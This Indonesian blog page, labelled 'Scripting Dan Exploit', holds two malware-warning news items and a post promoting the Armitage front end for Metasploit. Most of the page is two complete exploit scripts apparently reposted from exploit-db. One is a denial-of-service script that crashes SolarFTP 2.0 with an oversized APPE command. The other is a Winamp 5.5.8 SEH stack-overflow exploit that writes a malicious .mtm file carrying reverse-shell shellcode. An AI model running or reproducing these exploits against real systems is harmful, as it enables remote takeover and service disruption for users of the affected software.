Asalamualaikum ,  Selamat Datang  |  Its Not Diary  |  News And Opini  |  Thanks ?

Begitu banyak hal yang tertutupi dari negara kita sendiri bahkan dari konsep seluruh negara dan percayalah ada segelintir orang bahkan beberapa kelompok pemuja iblis yang mengatur konsep yang ada dan kita jalani saat ini.
Tampilkan postingan dengan label Scripting Dan Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Scripting Dan Exploit. Tampilkan semua postingan

Waspadai Link Palsu Video Osama (Awas jebakan betmen)


Simpang siur kabar bahwa Gedung Putih tidak akan merilis foto jenazah Osama bin Laden, di berbagai situs jejaring sosial seperti Facebook, beredar link-link yang menawarkan foto dan video kematian pemimpin al-Qaeda itu.

Namun, jangan percaya dan langsung mengklik begitu saja, karena link-link tersebut dicurigai sebagai spam dan bahkan bisa mengandung virus komputer berbahaya.

Pemerintah Federal dan pakar-pakar keamanan, sebagaimana dilaporkan CNN, telah mengeluarkan peringatan untuk para pengguna Internet agar berhati-hati mengklik link-link palsu terkait kematian Osama.

Menyusul operasi militer Amerika Serikat yang dilaporkan berhasil membunuh Osama, Minggu (1/5), Inbox e-mail dan sosial media seperti Facebook dibanjiri dengan link-link buruk setidaknya hanya spam atau kemungkinan terburuknya adalah mengandung virus komputer berbahaya.

Orang-orang di industri keamanan cyber tidak terkejut. Kejadian-kejadian besar, dan tokoh populer (Anna Kournikova dan Justin Bieber misalnya) sering dimanfaatkan sebagai umpan klik untuk menyebarkan spam dan scam.

"Saya kira ini (link-link palsu mengenai Osama) sebaiknya dihindari," tulis Dave Marcus, kepala penelitian keamanan untuk Mcfee Labs, dalam posting blog.

"Laporan kematian Osama bin Laden menjadi daya tarik yang terlalu bagus untuk dilewatkan bagi kriminal di dunia maya dan scammers," kata orang yang mem-posting beberapa contoh malware terkait Osama itu.

Satu pesan yang menawarkan link ke foto Osama yang sedang memegang koran, beredar untuk membuktikan bahwa pemimpin al-Qaeda itu masih hidup. Satu e-mail, yang ditulis dalam bahasa Spanyol, ditemukan mengandung virus Trojan Horse ketika link foto di dalamnya diklik.

Link itu berjudul Osama bin Laden Killed (Live on Video).

"Waspadalah terhadap pesan bertele-tele, baris subyek dalam e-mail, atau link-link via Facebook dan Twitter yang berisi kata-kata seperti itu--karena hampir pasti akan membawa anda dalam masalah," tulis Marcus.

"Pastikan perangkat lunak keamanan anda sepenuhnya diperbarui dan pastikan juga untuk menggunakan perangkat lunak browsing yang aman."

Sumber di Gedung Putih mengatakan bahwa Presiden AS Barack Obama telah memutuskan untuk tidak merilis foto-foto Osama.

Foto-foto palsu mengenai mayat Osama sudah beredar online.

Pada Rabu (4/5), Facebook mem-posting pesan yang mengingatkan pengguna agar berhati-hati ketika mengklik link-link dicurigai sebagai link-link spam mengenai Osama.

FBI juga merilis peringatan mengenai beredarnya software berbahaya yang disebarkan lewat link-link palsu.

Pusat Pengaduan Kejahatan Internet di FBI mengeluarkan saran-saran sebagai berikut:

Sesuaikan pengaturan privasi di situs jejaring sosial, seperti Facebook, untuk mem-filter item-item yang diposting ke dinding anda.

Jangan mengunduh perangkat lunak baru yang ditawarkan untuk melihat video. Aplikasi itu sering hanya sebagai topeng untuk menginveksi komputer anda.

Bacalah e-mail dan posting di media sosial dengan hati-hati. Pesan berbahaya sering ditulis dalam tata bahasa yang buruk, salah ejaan, dan kalimat bahasa Inggris tidak standar.

Laporkan pesan yang mengaku berasal dari FBI atau lembaga keamanan lainnya. Nama mereka sering digunakan untuk mencoba membangun legitimasi.
13.57 | 0 komentar

Hacker Intai Ponsel Pintar dan Facebook

Para pembobol data di internet atau disebut juga hacker makin malang melintang di rimbah persilatan. Ternyata, para hacker ini makin lihat dengan mengincar ponsel pintar dan jaringan pertemanan sosial seperti Facebook. Demikian dilansir Sydney Morning Herald, Rabu (6/4/2011).

Sebuah perusahaan pusat keamanan komputer, Symantec, mengeluarkan rilis yang menyatakan jika para kriminal di dunia maya makin canggih saja dalam menyerang pihak yang mereka incar. Para hacker ini mengincar kalangan bisnis dan jaringan pemerintah.

Symantec merilis, lebih dari 286 ancaman baru internet pada tahun lalu dan terus menyerang situs pertemanan sosial serta mengincar platforma ponsel pintar. "Kebanyakan platforma ponsel saat ini mengundang para hacker untuk menyerang," demikian isi rilis Symantec.

Maret lalu, ponsel pintar yang berbasis Android milik Google menjadi target terbesar tahun lalu dan merupakan serangan terbesar yang pernah ada.

"Serangan ini dilancarkan dari aplikasi mencurigakan di Android Market, pusat pemasaran resmi aplikasi untuk sistem operasi itu (Android)," demikian laporan yang diturunkan PandaLabs.

Tribunnews.com
02.00 | 0 komentar

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability



#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
# ___ _ __ __ __ _ __
# ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
# / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
# /____/ http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"


if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0]
sys.exit(0)

try:
s.connect((sys.argv[1], 21))
except:
print "Can\'t connect to server!\n"
sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('APPE '+junk+'\r\n')
s.recv(1024)
s.close()
23.12 | 0 komentar

Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)



#!/usr/bin/python
# finally got time to finish what I started...
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by fdisk
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# http://www.exploit-db.com/winamp-exploit-part-2/
# http://www.exploit-db.com/exploits/15287/
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.


header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16
nopsled = "\x90" * 58331

# windows/shell_reverse_tcp LHOST=192.168.33.114 LPORT=4444 (script kiddie unfriendly)
# bad chars: \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x0a\x0b\x0c\x0d\x0e\x0f
shellcode = ("\x89\xe1\xda\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4d\x38\x4d\x59\x43\x30"
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4b\x55\x56\x51\x58\x52\x43"
"\x54\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x51\x42\x54\x54\x43\x42\x51\x38\x54\x4f\x58\x37\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x58\x47\x5a\x42\x5a\x50\x51\x42\x50\x57\x4c\x4b"
"\x51\x42\x54\x50\x4c\x4b\x47\x32\x47\x4c\x45\x51\x4e\x30\x4c"
"\x4b\x47\x30\x43\x48\x4d\x55\x4f\x30\x43\x44\x50\x4a"
"\x4e\x30\x50\x50\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x4e\x33\x4b\x53\x47\x4c\x50\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x47\x48\x4b\x50"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x47"
"\x54\x54\x35\x4b\x52\x51\x48\x56\x38\x56\x44\x43\x31"
"\x49\x43\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x52\x48\x47\x43\x50"
"\x32\x43\x30\x52\x48\x52\x57\x52\x53\x50\x32\x51\x4f"
"\x51\x44\x52\x48\x50\x4c\x54\x37\x47\x56\x54\x47\x4b\x4f\x49"
"\x45\x4e\x58\x4c\x50\x45\x51\x43\x30\x43\x30\x56\x49"
"\x51\x44\x56\x30\x52\x48\x56\x49\x4d\x50\x52\x4b\x43\x30\x4b"
"\x4f\x58\x55\x50\x50\x50\x50\x50\x50\x50\x50\x51\x50\x56\x30"
"\x51\x50\x56\x30\x52\x48\x4b\x5a\x54\x4f\x4b\x50\x4b"
"\x4f\x49\x45\x4b\x39\x58\x47\x43\x58\x4f\x30\x4f\x58\x47\x51"
"\x54\x32\x45\x38\x45\x52\x43\x30\x54\x51\x51\x4c\x4c\x49\x5a"
"\x46\x52\x4a\x52\x30\x51\x46\x45\x38\x4d\x49\x4e\x45"
"\x43\x44\x45\x31\x4b\x4f\x58\x55\x45\x38\x43\x53\x52\x4d\x45"
"\x34\x45\x50\x4b\x39\x5a\x43\x56\x37\x56\x37\x50\x57\x56\x51"
"\x4c\x36\x52\x4a\x50\x59\x51\x46\x5a\x42\x4b\x4d\x45"
"\x36\x4f\x37\x51\x54\x47\x54\x47\x4c\x45\x51\x43\x31\x4c\x4d"
"\x51\x54\x56\x44\x52\x30\x49\x56\x43\x30\x51\x54\x51\x44\x56"
"\x30\x50\x56\x50\x56\x47\x36\x50\x56\x50\x4e\x50\x56"
"\x51\x46\x56\x33\x56\x36\x52\x48\x52\x59\x58\x4c\x47\x4f\x4c"
"\x46\x4b\x4f\x58\x55\x4d\x59\x4b\x50\x50\x4e\x50\x56"
"\x4b\x4f\x56\x50\x43\x58\x45\x58\x4b\x37\x45\x4d\x43\x50\x4b"
"\x4f\x58\x55\x4f\x4b\x4c\x30\x4f\x45\x4e\x42\x56\x36\x52\x48"
"\x4e\x46\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x47\x4c\x43"
"\x36\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x43\x35"
"\x4f\x4b\x51\x57\x45\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51"
"\x43\x4b\x4f\x58\x55\x45\x5a")

prepare_shellcode = "\x90" * 40
prepare_shellcode += "\x90\x33\xDB" # xor ebx,ebx
prepare_shellcode += "\x54\x5B" # push esp - pop ebx
prepare_shellcode += "\x81\xEB\x17\xCB\xFF\xFF" # sub ebx,-34E9
prepare_shellcode += "\x83\xc3\x3B" # add ebx,3B
prepare_shellcode += "\x83\xEB\x22" # sub ebx,22
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xC2" # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBE" # sub byte ptr ds:[ebx],0be
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC8" # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD9" # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD6" # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x80\x2B\xB6" # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD3" # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD8" # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD4" # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB4" # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD5" # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCC" # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xC9" # sub byte ptr ds:[ebx],0C9
prepare_shellcode += "\x90"*305

nseh = "\xeb\x30\x90\x90"
seh = "\x3f\x28\xd1\x72" # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
payload = header + nopsled + nseh + seh + prepare_shellcode + shellcode + "\x90" * 100

file = open("sploit.mtm", "w")
file.write(payload)
file.close()

print "sploit.mtm file generated successfuly"

22.53 | 0 komentar

Armitage - GUI Manajemen Attack

Armitage - GUI Manajemen Attack Untuk Metasploit Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda. Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver. Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.



Armitage membantu dengan Remote Exploitation - menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda. Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter. Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse



file, dan meluncurkan Command Shell membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan. Untuk menggunakan Armitage, Anda memerlukan berikut ini: * Linux atau Windows * Java 1.6 * Metasploit Framework 3.5 * Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.

Silahkan Download :

Download I
Download II



20.23 | 0 komentar

Categories

Info Detik

Study Islam - Moslem Answer

RYKERS Watch | Yahudi Indonesia

MUSLIM MENJAWAB TANTANGAN